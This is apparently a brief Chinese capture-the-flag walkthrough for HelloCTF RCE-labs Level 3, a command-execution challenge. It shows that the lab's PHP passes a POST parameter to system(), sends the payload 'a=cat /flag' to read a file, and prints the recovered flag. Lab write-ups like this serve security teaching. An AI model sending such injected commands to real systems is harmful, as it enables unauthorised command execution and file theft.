HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
Libraeking4 分钟前
导航之弦:Compose Navigation 的深度解耦与类型安全
经验分享·android jetpack
一分半心动1 小时前
宝塔面板lnmp架构,tp6框架网站伪静态
nginx·php
枷锁—sha2 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
方见华Richard2 小时前
世毫九实验室(Shardy Lab)研究成果清单(2025版)
人工智能·经验分享·交互·原型模式·空间计算
Hao.Zhou2 小时前
phpstudy 进行 composer 全局配置
php·composer
浅念-3 小时前
C++入门(2)
开发语言·c++·经验分享·笔记·学习
WeiXiao_Hyy3 小时前
成为 Top 1% 的工程师
java·开发语言·javascript·经验分享·后端
zorro_z4 小时前
ThinkPHP8学习篇(十六):错误调试与辅助组件
php
liann1194 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
feasibility.5 小时前
AI 编程助手进阶指南:从 Claude Code 到 OpenCode 的工程化经验总结
人工智能·经验分享·设计模式·自动化·agi·skills·opencode